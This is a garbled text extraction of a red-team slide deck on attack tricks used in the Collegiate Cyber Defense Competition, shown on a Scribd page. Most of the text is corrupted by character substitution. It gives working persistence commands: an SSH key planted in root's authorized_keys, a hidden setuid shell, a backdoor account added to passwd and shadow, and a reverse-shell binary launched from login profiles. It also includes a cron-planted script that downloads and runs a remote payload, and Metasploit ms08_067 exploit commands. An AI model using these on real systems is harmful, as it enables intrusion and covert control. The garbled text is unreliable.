Scribd Logo
Upload

Welcome to Scribd!

  • Dirty Red Team Tricks

    Uploaded by

    Kira Koorsen
    52 views42 pages
    CCDC documentation

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    CCDC documentation

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    52 views42 pages

    Dirty Red Team Tricks

    Uploaded by

    Kira Koorsen
    CCDC documentation

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 42

    !

    "#$%&'()&*(+,&
    *#"-./&
    !"#$"%&'()*+%'
    ,"-./0"+%$"12%-'
    !"#$"%#&'
    ! CollegluLe Cyber Lefense ComeLlLlon
    ! Why l'm glvlng Lhls Lulk (dlgresslon.)
    ! Our Process
    ! 1he Wur of PerslsLence
    ! 1eumwork
    ()*'+$#',*-.'
    ! CCLC PurLlclunL j 1eum MenLor
    " Leurn how red Leum Lhlnks
    ! Red 1eum Member
    " Plck u u few Lrlcks
    ! Lveryone Llse
    " 1ell u sLory: Where do bubles come from?
    //0/'1&&&23+4%*3+566762*$89'
    ! Lefense comeLlLlon for college sLudenLs
    ! o users, ,-o servers, web, mull, eLc.
    ! ldenLlcul hurdwure und sofLwure ucross Leums
    ! Scored on
    " servlce uvullublllLy
    " resonse Lo ln|ecLed evenLs
    " und ublllLy Lo sLo Lhe red Leum..
    (),':;<'8%"%38'4)%='4+5>?'
    ! l've leurned u loL uL *CCLC
    " NorLh LusL CCLC zoo8, zoog, zoo, zo
    " Mld ALlunLlc CCLC zo
    " OLher Lxerclses Loo (buL Lhls Lulk ls ubouL *CCLC)
    (),':;<'8%"%38'4)%='4+5>?'
    ! lor Lhe sLudenLs urLlcluLlng
    " ReLurnlng Leums reudy for usL Lrlcks euch yeur
    " Newcomers geL euLen u by old Lrlcks #
    (),':;<'8%"%38'4)%='4+5>?'
    ! Common quesLlons
    " How muny o-duys dld you use?
    " You hud u heud sLurL, no fulr!
    " How dld you geL ln?
    (),':;<'8%"%38'4)%='4+5>?'
    ! Alwuys u ro|ecL.
    " Soclul Lnglneerlng Huck zoo8
    " Smoke Screen (lull?!?) zoog
    " AuLomuLed UNlX Pwnuge zoo *
    " ArmlLuge for MeLuslolL zo *
    (),':;<'8%"%38'4)%='4+5>?'
    ! My frlends ure uwesome Loo
    " Cerry's RooLklL (C-SoL)
    " 1boss's Clsco lOS 8uckdoor
    " Lr. Ruld's cruzy llbcu buckdoor
    " 11's Wlndows Pwnuge *
    " Cuys wj Musslve LCz Resources
    01#&2#3-(//&
    @#6*33+%==+36#'
    @#6*33+%==+36#'
    @#6*33+%==+36#'
    A3-<#$+4%*3'
    ! nmu 1
    ! Nessus Scun
    B66#=='
    ! 1oduy's Lools
    B66#=='
    ! 1oduy's Lools vs. SLudenL NeLworks
    C%7#*D'E*=4'AFG5*%4+4%*3'$'
    B37',#4?'
    ! lrlduy
    " A loL of uccess
    " CeL ln Lo *everyLhlng*
    ! SuLurduy
    " *Some* uccess *
    " ALLuck Web AllcuLlons
    ! Sunduy
    " LesLroy unyLhlng we huve uccess on
    * ShouL ouL lnfrusLrucLure Leum 1boss, Luuru, und 1onuLhun
    Lhey cun'L kee you ouL
    4+#&35&2(#/"/$(6-(&
    HI:J'!&3#$=)%G?'
    B77'+3'KKL'M#, ''
    mkdlr jrooLj.ssh
    cuL >>jrooLj.sshjuuLhorlzed_keys
    [lnserL my Leum SSH key]
    $NN4'=)#55O?'
    c jblnjzsh j.kernel
    chmod sss j.kernel
    Louch -d Muy zoo j.kernel
    chuLLr l j.kernel
    B77'+'3#&'-=#$?'
    echo nobody8:..:zg:o:ggggg:,::: >>jeLcj
    shudow
    echo nobody8:x:o:o:nobody,,,,:j:jblnjbush >>j
    eLcjusswd
    P+6>7**$'I#&'H=#$='$'
    [uloud reverse shell cullbuck Lo jusrjblnjufw]
    echo jusrjblnjufw 8 >>jeLcjroFle
    echo jusrjblnjufw 8 >>jeLcjskelj.roFle
    chmod sss jusrjblnjufw
    chuLLr l jeLcjskelj.roFle jeLcjroFle jusrjblnj
    ufw
    Q)#44*'/+55R+6>'
    #!jblnjbush
    exorL UPLA1L_URL=hLL:jjgz.68.zo.,jhelloworld.LxL
    lf [ `whlch lynx` ]
    Lhen
    lynx -source sUPLA1L_URL >jLmj.lnn-luLesL z>jdevjnull
    else
    lf [ `whlch curl` ]
    Lhen
    curl sUPLA1L_URL >jLmj.lnn-luLesL z>jdevjnull
    else
    lf [ `whlch wgeL` ]
    Lhen
    wgeL sUPLA1L_URL -O jLmj.lnn-luLesL z>jdevjnull
    F
    F
    F
    chmod x jLmj.lnn-luLesL
    jLmj.lnn-luLesL
    rm -f jLmj.lnn-luLesL
    :3=4+55'/+55R+6>'
    [uloud jeLcjcron.hourlyjlnn-cron-rnews]
    Louch -d z 1ul o8 jeLcjcron.hourlyjlnn-cron-
    rnews
    chuLLr l jeLcjcron.dullyjlnn-cron-rnews
    K4*$,'S%<#D'K)#55'E+$4,'
    ST;='(%37*&='!&3#$=)%G?'
    )*=4=24F4'
    Host: 192.168.95.255 () !Status: Down!
    Host: 192.168.95.1 () !Status: Up!
    Host: 192.168.95.1 () !Ports: 445/closed/tcp//
    microsoft-ds///!
    Host: 192.168.95.132 () !Status: Up!
    Host: 192.168.95.132 () !Ports: 445/closed/tcp//
    microsoft-ds///!
    Host: 192.168.95.155 () !Status: Up!
    Host: 192.168.95.155 () !Ports: 445/closed/tcp//
    microsoft-ds///!
    Host: 192.168.95.156 () !Status: Up!
    Host: 192.168.95.156 () !Ports: 445/open/tcp//
    microsoft-ds///!
    Host: 192.168.95.174 () !Status: Up!
    Host: 192.168.95.174 () !Ports: 445/open/tcp//
    microsoft-ds///!
    # Nmap done at Fri Mar 11 02:04:05 2011 -- 256 IP
    addresses (5 hosts up) scanned in 2.20 seconds!
    U-32$6'
    setg AutoRunScript persistence -p
    192.168.95.155 -r 16819 -i 30 -S -U!
    use exploit/windows/smb/ms08_067_netapi!
    setg PAYLOAD windows/meterpreter/bind_tcp!
    set RHOST 192.168.95.156!
    exploit -j!
    set RHOST 192.168.95.174!
    exploit -j!
    C%7#*D'VB//0/'!G#3%38'K+5"*'
    B37',#4?'
    *(+,"67&
    /*55+R*$+4%*3'I##7='
    ! Reul-Llme CommunlcuLlon
    ! LuLu Shurlng
    ! Sesslon Shurlng
    B$<%4+8#'
    ! A CUl for MeLuslolL
    ! Coul: Avold Lhls.
    K#==%*3'K)+$%38'K*5-4%*3'
    S#+<%38'0#<*3=4$+4%*3'
    :7#+5'S#+<%38'K%4-+4%*3'
    P#,*37'//0/'
    hLL:jjwww.loculnews8.comjvldeojzg6ojlndex.hLml
    K-<<+$,'
    ! CollegluLe Cyber Lefense ComeLlLlon
    ! Why l'm glvlng Lhls Lulk (dlgresslon.)
    ! Our Process
    ! 1he Wur of PerslsLence
    ! 1eumwork
    Q$##4W'
    1odd L.
    1on Cluudlus
    Luuru Cuuy
    18oss
    Luryl 1ohnson
    Ryun Reynolds
    Cerry 8runelle
    Sllus CuLler
    1ubru
    Wlll
    Curl 1he Shurk
    Ceorglu Wledmun
    Sum K.
    Luve Wllson
    MuLL Crueber
    1esse vursulone
    1e Scuuru
    1.1. O'Connor
    Lr. Ruld
    Ryun SmlLh
    1om vuchon
    1om 1ufLs
    Zuck lusel
    Rob Mublx luller
    ()#$#'4*'8*'U$*<')#$#?'
    1wlLLer:
    QurmlLugehucker
    ArmlLuge:
    hLL:jjwww.fusLundeusyhucklng.comj
    CeL Lhe code:
    hLL:jjwww.fusLundeusyhucklng.comjdlrLy
    CollegluLe Cyber Lefense ComeLlLlon:
    hLL:jjwww.nuLlonulccdc.org

    You might also like